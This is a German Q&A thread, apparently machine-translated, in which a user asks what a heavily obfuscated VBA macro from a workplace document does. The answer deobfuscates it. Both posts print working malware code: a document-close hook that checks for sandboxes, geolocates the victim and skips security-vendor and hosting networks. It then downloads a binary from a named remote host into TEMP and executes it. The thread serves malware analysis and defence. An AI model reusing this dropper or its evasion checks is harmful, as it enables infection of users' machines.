Was genau macht dieser bösartige VBA-Code?

Question

Ich habe gerade dieses makrobasierte Dokument an meinem Arbeitsplatz mit diesem bösartigen Makrocode erhalten.
Da vb.net nicht wirklich meine starke Seite ist, kann ich nicht genau herausfinden, was es tut. Dies ist das einzige Makro, das ich im Dokument finden konnte.
Da der Code stark verschleiert ist, denke ich, dass es bösartig ist.

Public Sub Document_Close() 
On Error GoTo SWuc 
ZQZf 
Exit Sub 
SWuc: 
End Sub 
Public Sub ZQZf() 
Dim vmKT As String 
Dim UwuV As String 
Set PUQqU = CallByName(ThisDocument, s(61, "pocpiiAtlna", 107), 2) 
If CallByName(PUQqU, s(74, "mrUaeeNs", 29), 2) = s(31, "RESU", 35) Then UWaFZ (s(40, "uadrBsm naee", 89)) 
If CallByName(CallByName(PUQqU, s(41, "liFtneceRse", 109), 2), s(33, "tonCu", 8), 2) < 3 Then UWaFZ (s(72, "sih daByrot", 32)) 
Set mVEL = qizB(s(271, "5n.tq.ipHetWtnRs1tipe.HWtu", 99)) 
CallByName mVEL, s(27, "nepO", 11), 1, s(28, "EGT", 8), s(414, "m/t///g.xwsei2ooi./ty1p/dawpmcvecmw:ht.imn", 151), False 
CallByName mVEL, s(97, "qSeueaetdsReterH", 35), 1, s(62, "eeerrfR", 52), s(399, "arwmytxla/.es.eipicdwomha/-:dtew/-tmod/c-smnpsn", 452) 
CallByName mVEL, s(97, "qSeueaetdsReterH", 35), 1, s(15, "AetgrUe-sn", 53), s(635, ".0 o t/61nIplt6WMoieT;;(oi .l0)Tw1i5.;dEaa/.iSmln czdN0e Mrs0b", 221) 
CallByName mVEL, s(11, "dneS", 11), 1 
If CallByName(mVEL, s(13, "tSsuta", 11), 2) >= 400 Then UWaFZ (s(29, "'PnIa Cestsaecrodld at ", 67)) 
vmKT = CallByName(mVEL, s(115, "esnopseRtxeT", 71), 2) 
For Each ofJE In OImbM 
If InStr(LCase(vmKT), LCase(ofJE)) <> 0 Then UWaFZ (s(67, " daB:PSI", 23) & ofJE) 
Next 
CallByName mVEL, s(27, "nepO", 11), 1, s(28, "EGT", 8), s(237, "pnwm/cbtotoii.t/9cgf6h/9.cf1n:eo/oei", 101), False 
CallByName mVEL, s(97, "qSeueaetdsReterH", 35), 1, s(15, "AetgrUe-sn", 53), s(635, ".0 o t/61nIplt6WMoieT;;(oi .l0)Tw1i5.;dEaa/.iSmln czdN0e Mrs0b", 221) 
CallByName mVEL, s(11, "dneS", 11), 1 
If CallByName(mVEL, s(13, "tSsuta", 11), 2) >= 400 Then UWaFZ (s(261, "rCo nniitoaeddyawbf'lnl a", 249)) 
Set zGFN = CallByName(qizB(s(108, "lpltW.SSchrei", 41)), s(97, "nemnorivnEt", 43), 2, s(17, "OSCPERS", 9)) 
UwuV = zGFN(s(23, "PMET", 7)) & CallByName(PUQqU, s(74, "arapeShtaProt", 77), 2) & s(46, "1tt83mm2.pp", 37) 
Set wATB = qizB(s(128, "BmSDrDa.AtOe", 19)) 
CallByName wATB, s(17, "yTep", 11), 4, 1 
CallByName wATB, s(27, "nepO", 11), 1 
CallByName wATB, s(41, "rWeti", 29), 1, CallByName(mVEL, s(32, "BesyooseRndp", 101), 2) 
CallByName wATB, s(35, "olaTiSeFev", 37), 1, UwuV, 2 
CallByName wATB, s(8, "solCe", 14), 1 
CallByName qizB(s(108, "lpltW.SSchrei", 41)), s(31, "cexE", 7), 1, UwuV 
End Sub 
Public Function OImbM() 
OImbM = rHOu(Array(s(7, "MANOZA", 29), s(71, "OYOSNNMUA", 59), s(60, "DTNIEBFREED", 86), s(11, "ULBTAOC E", 26), s(101, "TSS SMIOYECCS", 139), _ 
s(41, "OCULD", 7), s(83, "EC ATADRETN", 109), s(15, "ECATADRETN", 69), s(107, "ARETENADTC", 93), s(47, "EADCDIEDT", 34), s(99, "P,SO ELSTE", 93), _ 
s(54, "IYREEFE", 9), s(17, "TRPNOEIFCO", 27), s(66, "ROFTENIT", 31), s(71, "EHRENZT", 69), s(16, "ETSOHD", 59), s(65, "SOHGNIT", 27), _ 
s(22, "ABEEESLW", 77), s(85, "COISMOTRF", 61), s(23, "ECROFN", 35), s(12, "SSV AOH", 74), s(95, "PNRFIPOOTO", 37), s(41, "ISUTERYC", 51), _ 
s(13, "ESREVR", 29), s(205, "HOGETL SNNICROTSOGE", 46), s(89, "RTEDMCORN I", 17), s(15, "AWTSURTEV", 62), s(19, "RAIO RNHEATMC", 75), _ 
s(44, "AUORCLPKEKBMCTASO", 80), s(25, "AMESICTM", 59), s(11, "RTORCIMDNE", 99))) 
End Function 
Public Sub UWaFZ(ByVal ltfqE As String) 
Err.Raise Number:=2, Description:=ltfqE 
End Sub 
Public Function qizB(ByVal DVnR As String) 
Set qizB = feZmA(CreateObject(DVnR)) 
End Function 
Public Function feZmA(ByVal jfcO As Object) 
Set feZmA = jfcO 
End Function 
Public Function rHOu(ByVal iMqIc) 
rHOu = iMqIc 
End Function 
Public Function s(ByVal DDniC As Integer, ByVal Sfrf As String, ByVal QuJk As Integer) As String 
Dim qnJn As Integer 
qnJn = GzSvR(DDniC, Len(Sfrf)) 
Do While Len(s) < Len(Sfrf) 
s = s & gOtmH(Sfrf, qnJn) 
qnJn = GzSvR((qnJn + QuJk), Len(Sfrf)) 
Loop 
End Function 
Public Function gOtmH(ByVal vdHA As String, ByVal qnJn As Integer) As String 
gOtmH = Right(Left(vdHA, qnJn + 1), 1) 
End Function 
Public Function GzSvR(ByVal JtMKn As Integer, ByVal PfnR As Integer) As Integer 
GzSvR = JtMKn - (PfnR * (JtMKn \ PfnR)) 
End Function 

Answer 1

ACHTUNG: Laufen Sie den Code nicht (oder OPs)

Dies ist ein binäres Downloader, und zumindest auf der VBA Seite ist Skript-Kiddie-Level-Code. Wenn ich de-verschleiert es, die entstellten Namen ersetzen und Inline einige der Funktion nennt es wie folgt aussieht: ist

Public Sub Document_Close() 
    On Error GoTo QuietExit 
    MaliciousCode 
    Exit Sub 
QuietExit: 
End Sub 

Public Sub MaliciousCode() 
    Err.Raise 666, , "Do not execute this." 'NOTE: I added this ;-) 

    Dim response As String 
    Dim filePath As String 

    Set wdApp = ThisDocument.Application 
    If wdApp.UserName = "USER" Then Err.Raise 2, "Bad username" 
    If wdApp.RecentFiles.Count < 3 Then Err.Raise 2, "Bad history" 

    Set webRequest = CreateObject("WinHttp.WinHttpRequest.5.1") 
    webRequest.Open "GET", "https://www.maxmind.com/geoip/v2.1/city/me", False 
    webRequest.SetRequestHeader "Referer", "https://www.maxmind.com/en/locate-my-ip-address" 
    webRequest.SetRequestHeader "User-Agent", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" 
    webRequest.Send 

    If webRequest.Status >= 400 Then Err.Raise 2, "Can't locate IP address" 

    response = webRequest.ResponseText 
    For Each isp In GetBadISPList 
     If InStr(LCase(response), LCase(isp)) <> 0 Then Err.Raise 2, "Bad ISP: " & isp 
    Next 

    webRequest.Open "GET", "http://one99two.com/cgi/office16.bin", False 
    webRequest.SetRequestHeader "User-Agent", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" 
    webRequest.Send 

    If webRequest.Status >= 400 Then Err.Raise 2, "Can't download binary file" 

    Set env = CreateObject("WScript.Shell").Environment("PROCESS") 
    filePath = env("TEMP") & wdApp.PathSeparator & "tmp8213.tmp" 
    Set outStream = CreateObject("ADODB.Stream") 
    outStream.Type = adTypeBinary 
    outStream.Open 
    outStream.Write webRequest.ResponseBody 
    outStream.SaveToFile 
    outStream.Close 

    CreateObject("WScript.Shell").Exec filePath 
End Sub 

Public Function GetBadISPList() 
    GetBadISPList = Array("AMAZON", "ANONYMOUS", "BITDEFENDER", "BLUE COAT", "CISCO SYSTEMS", _ 
         "CLOUD", "DATA CENTER", "DATACENTER", "DATACENTRE", "DEDICATED", "ESET, SPOL", _ 
         "FIREEYE", "FORCEPOINT", "FORTINET", "HETZNER", "HOSTED", "HOSTING", _ 
         "LEASEWEB", "MICROSOFT", "NFORCE", "OVH SAS", "PROOFPOINT", "SECURITY", _ 
         "SERVER", "STRONG TECHNOLOGIES", "TREND MICRO", "TRUSTWAVE", "NORTH AMERICA", _ 
         "BLACKOAKCOMPUTERS", "MIMECAST", "TRENDMICRO") 
End Function 

Die Download-Site in Pakistan registriert und wird von Google als bösartig Liste steht. Beachten Sie, dass mein anfängliches Misstrauen, dass es sich um ein Bot-Net-Installationsprogramm handelt, auf dem Abrufen der IP-Adresse beruht, aber es sieht wie ein primitiver Versuch aus, das Ausführen auf gehosteten Plattformen und AV-Provider-Domains zu vermeiden. Die Binärdatei könnte eigentlich alles sein.

Der Grund, dass Virustotal nicht auf die Datei trifft, ist offensichtlich auf die Verschleierung zurückzuführen. Der Code über actually does get some hits.